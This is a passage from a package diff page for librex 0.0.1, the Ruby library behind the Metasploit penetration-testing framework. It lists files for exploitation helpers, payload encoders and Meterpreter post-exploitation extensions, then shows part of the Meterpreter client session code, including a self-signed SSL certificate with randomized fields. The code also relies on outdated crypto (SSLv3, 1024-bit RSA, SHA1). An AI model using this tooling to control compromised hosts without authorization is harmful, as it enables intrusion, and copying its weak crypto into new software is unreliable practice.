librex 0.0.1
Sign up to get free protection for your applications and to get access to all the features.
- data/README +4 -0
- data/lib/rex.rb +101 -0
- data/lib/rex.rb.ts.rb +70 -0
- data/lib/rex/LICENSE +29 -0
- data/lib/rex/arch.rb +103 -0
- data/lib/rex/arch/sparc.rb +75 -0
- data/lib/rex/arch/sparc.rb.ut.rb +18 -0
- data/lib/rex/arch/x86.rb +513 -0
- data/lib/rex/arch/x86.rb.ut.rb +93 -0
- data/lib/rex/assembly/nasm.rb +100 -0
- data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
- data/lib/rex/codepage.map +104 -0
- data/lib/rex/compat.rb +281 -0
- data/lib/rex/constants.rb +113 -0
- data/lib/rex/elfparsey.rb +11 -0
- data/lib/rex/elfparsey/elf.rb +123 -0
- data/lib/rex/elfparsey/elfbase.rb +260 -0
- data/lib/rex/elfparsey/exceptions.rb +27 -0
- data/lib/rex/elfscan.rb +12 -0
- data/lib/rex/elfscan/scanner.rb +207 -0
- data/lib/rex/elfscan/search.rb +46 -0
- data/lib/rex/encoder/alpha2.rb +31 -0
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
- data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
- data/lib/rex/encoder/alpha2/generic.rb +113 -0
- data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
- data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
- data/lib/rex/encoder/ndr.rb +89 -0
- data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
- data/lib/rex/encoder/nonalpha.rb +61 -0
- data/lib/rex/encoder/nonupper.rb +64 -0
- data/lib/rex/encoder/xdr.rb +106 -0
- data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
- data/lib/rex/encoder/xor.rb +69 -0
- data/lib/rex/encoder/xor/dword.rb +13 -0
- data/lib/rex/encoder/xor/dword_additive.rb +13 -0
- data/lib/rex/encoders/xor_dword.rb +35 -0
- data/lib/rex/encoders/xor_dword_additive.rb +53 -0
- data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
- data/lib/rex/encoding/xor.rb +20 -0
- data/lib/rex/encoding/xor.rb.ts.rb +14 -0
- data/lib/rex/encoding/xor/byte.rb +15 -0
- data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
- data/lib/rex/encoding/xor/dword.rb +21 -0
- data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
- data/lib/rex/encoding/xor/dword_additive.rb +92 -0
- data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
- data/lib/rex/encoding/xor/exceptions.rb +17 -0
- data/lib/rex/encoding/xor/generic.rb +146 -0
- data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
- data/lib/rex/encoding/xor/qword.rb +15 -0
- data/lib/rex/encoding/xor/word.rb +21 -0
- data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
- data/lib/rex/exceptions.rb +275 -0
- data/lib/rex/exceptions.rb.ut.rb +44 -0
- data/lib/rex/exploitation/cmdstager.rb +133 -0
- data/lib/rex/exploitation/egghunter.rb +143 -0
- data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
- data/lib/rex/exploitation/encryptjs.rb +77 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +94 -0
- data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
- data/lib/rex/exploitation/obfuscatejs.rb +335 -0
- data/lib/rex/exploitation/opcodedb.rb +818 -0
- data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
- data/lib/rex/exploitation/seh.rb +92 -0
- data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
- data/lib/rex/file.rb +84 -0
- data/lib/rex/file.rb.ut.rb +16 -0
- data/lib/rex/image_source.rb +12 -0
- data/lib/rex/image_source/disk.rb +60 -0
- data/lib/rex/image_source/image_source.rb +46 -0
- data/lib/rex/image_source/memory.rb +37 -0
- data/lib/rex/io/bidirectional_pipe.rb +157 -0
- data/lib/rex/io/datagram_abstraction.rb +35 -0
- data/lib/rex/io/stream.rb +313 -0
- data/lib/rex/io/stream_abstraction.rb +186 -0
- data/lib/rex/io/stream_server.rb +211 -0
- data/lib/rex/job_container.rb +202 -0
- data/lib/rex/logging.rb +4 -0
- data/lib/rex/logging/log_dispatcher.rb +179 -0
- data/lib/rex/logging/log_sink.rb +42 -0
- data/lib/rex/logging/sinks/flatfile.rb +55 -0
- data/lib/rex/logging/sinks/stderr.rb +43 -0
- data/lib/rex/machparsey.rb +9 -0
- data/lib/rex/machparsey/exceptions.rb +34 -0
- data/lib/rex/machparsey/mach.rb +209 -0
- data/lib/rex/machparsey/machbase.rb +408 -0
- data/lib/rex/machscan.rb +9 -0
- data/lib/rex/machscan/scanner.rb +217 -0
- data/lib/rex/mime.rb +9 -0
- data/lib/rex/mime/header.rb +75 -0
- data/lib/rex/mime/message.rb +112 -0
- data/lib/rex/mime/part.rb +20 -0
- data/lib/rex/nop/opty2.rb +108 -0
- data/lib/rex/nop/opty2.rb.ut.rb +23 -0
- data/lib/rex/nop/opty2_tables.rb +300 -0
- data/lib/rex/ole.rb +128 -0
- data/lib/rex/ole/clsid.rb +47 -0
- data/lib/rex/ole/difat.rb +141 -0
- data/lib/rex/ole/directory.rb +230 -0
- data/lib/rex/ole/direntry.rb +240 -0
- data/lib/rex/ole/fat.rb +99 -0
- data/lib/rex/ole/header.rb +204 -0
- data/lib/rex/ole/minifat.rb +77 -0
- data/lib/rex/ole/samples/create_ole.rb +27 -0
- data/lib/rex/ole/samples/dir.rb +35 -0
- data/lib/rex/ole/samples/dump_stream.rb +34 -0
- data/lib/rex/ole/samples/ole_info.rb +23 -0
- data/lib/rex/ole/storage.rb +395 -0
- data/lib/rex/ole/stream.rb +53 -0
- data/lib/rex/ole/substorage.rb +49 -0
- data/lib/rex/ole/util.rb +157 -0
- data/lib/rex/parser/arguments.rb +97 -0
- data/lib/rex/parser/arguments.rb.ut.rb +67 -0
- data/lib/rex/parser/ini.rb +185 -0
- data/lib/rex/parser/ini.rb.ut.rb +29 -0
- data/lib/rex/parser/nmap_xml.rb +111 -0
- data/lib/rex/payloads.rb +1 -0
- data/lib/rex/payloads/win32.rb +2 -0
- data/lib/rex/payloads/win32/common.rb +26 -0
- data/lib/rex/payloads/win32/kernel.rb +53 -0
- data/lib/rex/payloads/win32/kernel/common.rb +54 -0
- data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
- data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
- data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
- data/lib/rex/peparsey.rb +12 -0
- data/lib/rex/peparsey/exceptions.rb +32 -0
- data/lib/rex/peparsey/pe.rb +188 -0
- data/lib/rex/peparsey/pe_memdump.rb +63 -0
- data/lib/rex/peparsey/pebase.rb +1655 -0
- data/lib/rex/peparsey/section.rb +136 -0
- data/lib/rex/pescan.rb +13 -0
- data/lib/rex/pescan/analyze.rb +309 -0
- data/lib/rex/pescan/scanner.rb +206 -0
- data/lib/rex/pescan/search.rb +56 -0
- data/lib/rex/platforms.rb +1 -0
- data/lib/rex/platforms/windows.rb +51 -0
- data/lib/rex/poly.rb +132 -0
- data/lib/rex/poly/block.rb +468 -0
- data/lib/rex/poly/register.rb +100 -0
- data/lib/rex/poly/register/x86.rb +40 -0
- data/lib/rex/post.rb +8 -0
- data/lib/rex/post/dir.rb +51 -0
- data/lib/rex/post/file.rb +172 -0
- data/lib/rex/post/file_stat.rb +220 -0
- data/lib/rex/post/gen.pl +13 -0
- data/lib/rex/post/io.rb +182 -0
- data/lib/rex/post/meterpreter.rb +4 -0
- data/lib/rex/post/meterpreter/channel.rb +438 -0
- data/lib/rex/post/meterpreter/channel_container.rb +54 -0
- data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
- data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
- data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
- data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
- data/lib/rex/post/meterpreter/client.rb +335 -0
- data/lib/rex/post/meterpreter/client_core.rb +274 -0
- data/lib/rex/post/meterpreter/dependencies.rb +3 -0
- data/lib/rex/post/meterpreter/extension.rb +32 -0
- data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
- data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
- data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
- data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
- data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
- data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
- data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
- data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
- data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
- data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
- data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
- data/lib/rex/post/meterpreter/packet.rb +596 -0
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
- data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
- data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
- data/lib/rex/post/meterpreter/ui/console.rb +135 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
- data/lib/rex/post/permission.rb +26 -0
- data/lib/rex/post/process.rb +57 -0
- data/lib/rex/post/thread.rb +57 -0
- data/lib/rex/post/ui.rb +52 -0
- data/lib/rex/proto.rb +12 -0
- data/lib/rex/proto.rb.ts.rb +8 -0
- data/lib/rex/proto/dcerpc.rb +6 -0
- data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
- data/lib/rex/proto/dcerpc/client.rb +358 -0
- data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
- data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
- data/lib/rex/proto/dcerpc/handle.rb +47 -0
- data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
- data/lib/rex/proto/dcerpc/ndr.rb +72 -0
- data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
- data/lib/rex/proto/dcerpc/packet.rb +253 -0
- data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
- data/lib/rex/proto/dcerpc/response.rb +186 -0
- data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
- data/lib/rex/proto/dcerpc/uuid.rb +84 -0
- data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
- data/lib/rex/proto/drda.rb +5 -0
- data/lib/rex/proto/drda.rb.ts.rb +17 -0
- data/lib/rex/proto/drda/constants.rb +49 -0
- data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
- data/lib/rex/proto/drda/packet.rb +252 -0
- data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
- data/lib/rex/proto/drda/utils.rb +123 -0
- data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
- data/lib/rex/proto/http.rb +5 -0
- data/lib/rex/proto/http.rb.ts.rb +12 -0
- data/lib/rex/proto/http/client.rb +817 -0
- data/lib/rex/proto/http/client.rb.ut.rb +93 -0
- data/lib/rex/proto/http/handler.rb +46 -0
- data/lib/rex/proto/http/handler/erb.rb +128 -0
- data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
- data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
- data/lib/rex/proto/http/handler/proc.rb +54 -0
- data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
- data/lib/rex/proto/http/header.rb +161 -0
- data/lib/rex/proto/http/header.rb.ut.rb +46 -0
- data/lib/rex/proto/http/packet.rb +394 -0
- data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
- data/lib/rex/proto/http/request.rb +356 -0
- data/lib/rex/proto/http/request.rb.ut.rb +214 -0
- data/lib/rex/proto/http/response.rb +85 -0
- data/lib/rex/proto/http/response.rb.ut.rb +149 -0
- data/lib/rex/proto/http/server.rb +367 -0
- data/lib/rex/proto/http/server.rb.ut.rb +79 -0
- data/lib/rex/proto/smb.rb +7 -0
- data/lib/rex/proto/smb.rb.ts.rb +8 -0
- data/lib/rex/proto/smb/client.rb +1733 -0
- data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
- data/lib/rex/proto/smb/constants.rb +1062 -0
- data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
- data/lib/rex/proto/smb/crypt.rb +95 -0
- data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
- data/lib/rex/proto/smb/evasions.rb +65 -0
- data/lib/rex/proto/smb/exceptions.rb +846 -0
- data/lib/rex/proto/smb/simpleclient.rb +292 -0
- data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
- data/lib/rex/proto/smb/utils.rb +514 -0
- data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
- data/lib/rex/proto/sunrpc.rb +1 -0
- data/lib/rex/proto/sunrpc/client.rb +195 -0
- data/lib/rex/script.rb +42 -0
- data/lib/rex/script/base.rb +59 -0
- data/lib/rex/script/meterpreter.rb +9 -0
- data/lib/rex/script/shell.rb +9 -0
- data/lib/rex/service.rb +48 -0
- data/lib/rex/service_manager.rb +141 -0
- data/lib/rex/service_manager.rb.ut.rb +32 -0
- data/lib/rex/services/local_relay.rb +423 -0
- data/lib/rex/socket.rb +586 -0
- data/lib/rex/socket.rb.ut.rb +86 -0
- data/lib/rex/socket/comm.rb +119 -0
- data/lib/rex/socket/comm/local.rb +409 -0
- data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
- data/lib/rex/socket/ip.rb +129 -0
- data/lib/rex/socket/parameters.rb +345 -0
- data/lib/rex/socket/parameters.rb.ut.rb +51 -0
- data/lib/rex/socket/range_walker.rb +295 -0
- data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
- data/lib/rex/socket/ssl_tcp.rb +184 -0
- data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
- data/lib/rex/socket/ssl_tcp_server.rb +122 -0
- data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
- data/lib/rex/socket/subnet_walker.rb +75 -0
- data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
- data/lib/rex/socket/switch_board.rb +272 -0
- data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
- data/lib/rex/socket/tcp.rb +76 -0
- data/lib/rex/socket/tcp.rb.ut.rb +64 -0
- data/lib/rex/socket/tcp_server.rb +67 -0
- data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
- data/lib/rex/socket/udp.rb +157 -0
- data/lib/rex/socket/udp.rb.ut.rb +44 -0
- data/lib/rex/struct2.rb +5 -0
- data/lib/rex/struct2/c_struct.rb +181 -0
- data/lib/rex/struct2/c_struct_template.rb +39 -0
- data/lib/rex/struct2/constant.rb +26 -0
- data/lib/rex/struct2/element.rb +44 -0
- data/lib/rex/struct2/generic.rb +73 -0
- data/lib/rex/struct2/restraint.rb +54 -0
- data/lib/rex/struct2/s_string.rb +72 -0
- data/lib/rex/struct2/s_struct.rb +111 -0
- data/lib/rex/sync.rb +6 -0
- data/lib/rex/sync/event.rb +94 -0
- data/lib/rex/sync/read_write_lock.rb +176 -0
- data/lib/rex/sync/ref.rb +57 -0
- data/lib/rex/sync/thread_safe.rb +82 -0
- data/lib/rex/test.rb +35 -0
- data/lib/rex/text.rb +1029 -0
- data/lib/rex/text.rb.ut.rb +168 -0
- data/lib/rex/time.rb +65 -0
- data/lib/rex/transformer.rb +115 -0
- data/lib/rex/transformer.rb.ut.rb +38 -0
- data/lib/rex/ui.rb +21 -0
- data/lib/rex/ui/interactive.rb +252 -0
- data/lib/rex/ui/output.rb +80 -0
- data/lib/rex/ui/output/none.rb +18 -0
- data/lib/rex/ui/progress_tracker.rb +96 -0
- data/lib/rex/ui/subscriber.rb +149 -0
- data/lib/rex/ui/text/color.rb +97 -0
- data/lib/rex/ui/text/color.rb.ut.rb +18 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
- data/lib/rex/ui/text/input.rb +117 -0
- data/lib/rex/ui/text/input/buffer.rb +75 -0
- data/lib/rex/ui/text/input/readline.rb +129 -0
- data/lib/rex/ui/text/input/socket.rb +95 -0
- data/lib/rex/ui/text/input/stdio.rb +45 -0
- data/lib/rex/ui/text/irb_shell.rb +55 -0
- data/lib/rex/ui/text/output.rb +80 -0
- data/lib/rex/ui/text/output/buffer.rb +65 -0
- data/lib/rex/ui/text/output/file.rb +37 -0
- data/lib/rex/ui/text/output/socket.rb +43 -0
- data/lib/rex/ui/text/output/stdio.rb +40 -0
- data/lib/rex/ui/text/progress_tracker.rb +56 -0
- data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
- data/lib/rex/ui/text/shell.rb +321 -0
- data/lib/rex/ui/text/table.rb +254 -0
- data/lib/rex/ui/text/table.rb.ut.rb +55 -0
- data/lib/rex/zip.rb +93 -0
- data/lib/rex/zip/archive.rb +91 -0
- data/lib/rex/zip/blocks.rb +182 -0
- data/lib/rex/zip/entry.rb +95 -0
- data/lib/rex/zip/samples/comment.rb +32 -0
- data/lib/rex/zip/samples/mkwar.rb +138 -0
- data/lib/rex/zip/samples/mkzip.rb +19 -0
- data/lib/rex/zip/samples/recursive.rb +58 -0
- metadata +435 -0
@@ -0,0 +1,335 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
|
3
|
+
require 'socket'
|
4
|
+
require 'openssl'
|
5
|
+
|
6
|
+
require 'rex/script'
|
7
|
+
require 'rex/post/meterpreter/client_core'
|
8
|
+
require 'rex/post/meterpreter/channel'
|
9
|
+
require 'rex/post/meterpreter/channel_container'
|
10
|
+
require 'rex/post/meterpreter/dependencies'
|
11
|
+
require 'rex/post/meterpreter/object_aliases'
|
12
|
+
require 'rex/post/meterpreter/packet'
|
13
|
+
require 'rex/post/meterpreter/packet_parser'
|
14
|
+
require 'rex/post/meterpreter/packet_dispatcher'
|
15
|
+
|
16
|
+
module Rex
|
17
|
+
module Post
|
18
|
+
module Meterpreter
|
19
|
+
|
20
|
+
#
|
21
|
+
# Just to get it in there...
|
22
|
+
#
|
23
|
+
module Extensions
|
24
|
+
end
|
25
|
+
|
26
|
+
###
|
27
|
+
#
|
28
|
+
# This class represents a logical meterpreter client class. This class
|
29
|
+
# provides an interface that is compatible with the Rex post-exploitation
|
30
|
+
# interface in terms of the feature set that it attempts to expose. This
|
31
|
+
# class is meant to drive a single meterpreter client session.
|
32
|
+
#
|
33
|
+
###
|
34
|
+
class Client
|
35
|
+
|
36
|
+
include Rex::Post::Meterpreter::PacketDispatcher
|
37
|
+
include Rex::Post::Meterpreter::ChannelContainer
|
38
|
+
|
39
|
+
#
|
40
|
+
# Extension name to class hash.
|
41
|
+
#
|
42
|
+
@@ext_hash = {}
|
43
|
+
|
44
|
+
#
|
45
|
+
# Checks the extension hash to see if a class has already been associated
|
46
|
+
# with the supplied extension name.
|
47
|
+
#
|
48
|
+
def self.check_ext_hash(name)
|
49
|
+
@@ext_hash[name]
|
50
|
+
end
|
51
|
+
|
52
|
+
#
|
53
|
+
# Stores the name to class association for the supplied extension name.
|
54
|
+
#
|
55
|
+
def self.set_ext_hash(name, klass)
|
56
|
+
@@ext_hash[name] = klass
|
57
|
+
end
|
58
|
+
|
59
|
+
#
|
60
|
+
# Initializes the client context with the supplied socket through
|
61
|
+
# which communication with the server will be performed.
|
62
|
+
#
|
63
|
+
def initialize(sock,opts={})
|
64
|
+
init_meterpreter(sock, opts)
|
65
|
+
end
|
66
|
+
|
67
|
+
#
|
68
|
+
# Cleans up the meterpreter instance, terminating the dispatcher thread.
|
69
|
+
#
|
70
|
+
def cleanup_meterpreter
|
71
|
+
dispatcher_thread.kill if dispatcher_thread
|
72
|
+
end
|
73
|
+
|
74
|
+
#
|
75
|
+
# Initializes the meterpreter client instance
|
76
|
+
#
|
77
|
+
def init_meterpreter(sock,opts={})
|
78
|
+
self.sock = sock
|
79
|
+
self.parser = PacketParser.new
|
80
|
+
self.ext = ObjectAliases.new
|
81
|
+
self.ext_aliases = ObjectAliases.new
|
82
|
+
self.alive = true
|
83
|
+
self.target_id = opts[:target_id]
|
84
|
+
|
85
|
+
self.response_timeout = opts[:timeout] || self.class.default_timeout
|
86
|
+
self.send_keepalives = true
|
87
|
+
|
88
|
+
|
89
|
+
# Switch the socket to SSL mode and receive the hello if needed
|
90
|
+
if not opts[:skip_ssl]
|
91
|
+
swap_sock_plain_to_ssl()
|
92
|
+
end
|
93
|
+
|
94
|
+
register_extension_alias('core', ClientCore.new(self))
|
95
|
+
|
96
|
+
initialize_inbound_handlers
|
97
|
+
initialize_channels
|
98
|
+
|
99
|
+
# Register the channel inbound packet handler
|
100
|
+
register_inbound_handler(Rex::Post::Meterpreter::Channel)
|
101
|
+
|
102
|
+
monitor_socket
|
103
|
+
end
|
104
|
+
|
105
|
+
def swap_sock_plain_to_ssl
|
106
|
+
# Create a new SSL session on the existing socket
|
107
|
+
ctx = generate_ssl_context()
|
108
|
+
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
|
109
|
+
|
110
|
+
ssl.accept
|
111
|
+
|
112
|
+
self.sock.extend(Rex::Socket::SslTcp)
|
113
|
+
self.sock.sslsock = ssl
|
114
|
+
self.sock.sslctx = ctx
|
115
|
+
|
116
|
+
tag = self.sock.get_once(-1, 30)
|
117
|
+
if(not tag or tag !~ /^GET \//)
|
118
|
+
raise RuntimeError, "Could not read the HTTP hello token"
|
119
|
+
end
|
120
|
+
end
|
121
|
+
|
122
|
+
def swap_sock_ssl_to_plain
|
123
|
+
# Remove references to the SSLSocket and Context
|
124
|
+
self.sock.sslsock.close
|
125
|
+
self.sock.sslsock = nil
|
126
|
+
self.sock.sslctx = nil
|
127
|
+
self.sock = self.sock.fd
|
128
|
+
self.sock.extend(::Rex::Socket::Tcp)
|
129
|
+
end
|
130
|
+
|
131
|
+
def generate_ssl_context
|
132
|
+
key = OpenSSL::PKey::RSA.new(1024){ }
|
133
|
+
cert = OpenSSL::X509::Certificate.new
|
134
|
+
cert.version = 2
|
135
|
+
cert.serial = rand(0xFFFFFFFF)
|
136
|
+
|
137
|
+
subject = OpenSSL::X509::Name.new([
|
138
|
+
["C","US"],
|
139
|
+
['ST', Rex::Text.rand_state()],
|
140
|
+
["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
|
141
|
+
["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
|
142
|
+
["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
|
143
|
+
])
|
144
|
+
issuer = OpenSSL::X509::Name.new([
|
145
|
+
["C","US"],
|
146
|
+
['ST', Rex::Text.rand_state()],
|
147
|
+
["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
|
148
|
+
["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
|
149
|
+
["CN", Rex::Text.rand_text_alpha(rand(20) + 10)],
|
150
|
+
])
|
151
|
+
|
152
|
+
cert.subject = subject
|
153
|
+
cert.issuer = issuer
|
154
|
+
cert.not_before = Time.now - (3600 * 365) + rand(3600 * 14)
|
155
|
+
cert.not_after = Time.now + (3600 * 365) + rand(3600 * 14)
|
156
|
+
cert.public_key = key.public_key
|
157
|
+
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
|
158
|
+
cert.extensions = [
|
159
|
+
ef.create_extension("basicConstraints","CA:FALSE"),
|
160
|
+
ef.create_extension("subjectKeyIdentifier","hash"),
|
161
|
+
ef.create_extension("extendedKeyUsage","serverAuth"),
|
162
|
+
ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
|
163
|
+
]
|
164
|
+
ef.issuer_certificate = cert
|
165
|
+
cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
|
166
|
+
cert.sign(key, OpenSSL::Digest::SHA1.new)
|
167
|
+
|
168
|
+
ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
|
169
|
+
ctx.key = key
|
170
|
+
ctx.cert = cert
|
171
|
+
|
172
|
+
ctx.session_id_context = Rex::Text.rand_text(16)
|
173
|
+
|
174
|
+
return ctx
|
175
|
+
end
|
176
|
+
|
177
|
+
#
|
178
|
+
# Runs the meterpreter script in the context of a script container
|
179
|
+
#
|
180
|
+
def execute_file(file, args)
|
181
|
+
o = Rex::Script::Meterpreter.new(self, file)
|
182
|
+
o.run(args)
|
183
|
+
end
|
184
|
+
|
185
|
+
##
|
186
|
+
#
|
187
|
+
# Accessors
|
188
|
+
#
|
189
|
+
##
|
190
|
+
|
191
|
+
#
|
192
|
+
# Returns the default timeout that request packets will use when
|
193
|
+
# waiting for a response.
|
194
|
+
#
|
195
|
+
def Client.default_timeout
|
196
|
+
return 30
|
197
|
+
end
|
198
|
+
|
199
|
+
##
|
200
|
+
#
|
201
|
+
# Alias processor
|
202
|
+
#
|
203
|
+
##
|
204
|
+
|
205
|
+
#
|
206
|
+
# Translates unhandled methods into registered extension aliases
|
207
|
+
# if a matching extension alias exists for the supplied symbol.
|
208
|
+
#
|
209
|
+
def method_missing(symbol, *args)
|
210
|
+
self.ext_aliases.aliases[symbol.to_s]
|
211
|
+
end
|
212
|
+
|
213
|
+
##
|
214
|
+
#
|
215
|
+
# Extension registration
|
216
|
+
#
|
217
|
+
##
|
218
|
+
|
219
|
+
#
|
220
|
+
# Loads the client half of the supplied extension and initializes it as a
|
221
|
+
# registered extension that can be reached through client.ext.[extension].
|
222
|
+
#
|
223
|
+
def add_extension(name)
|
224
|
+
# Check to see if this extension has already been loaded.
|
225
|
+
if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
|
226
|
+
old = Rex::Post::Meterpreter::Extensions.constants
|
227
|
+
require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
|
228
|
+
new = Rex::Post::Meterpreter::Extensions.constants
|
229
|
+
|
230
|
+
# No new constants added?
|
231
|
+
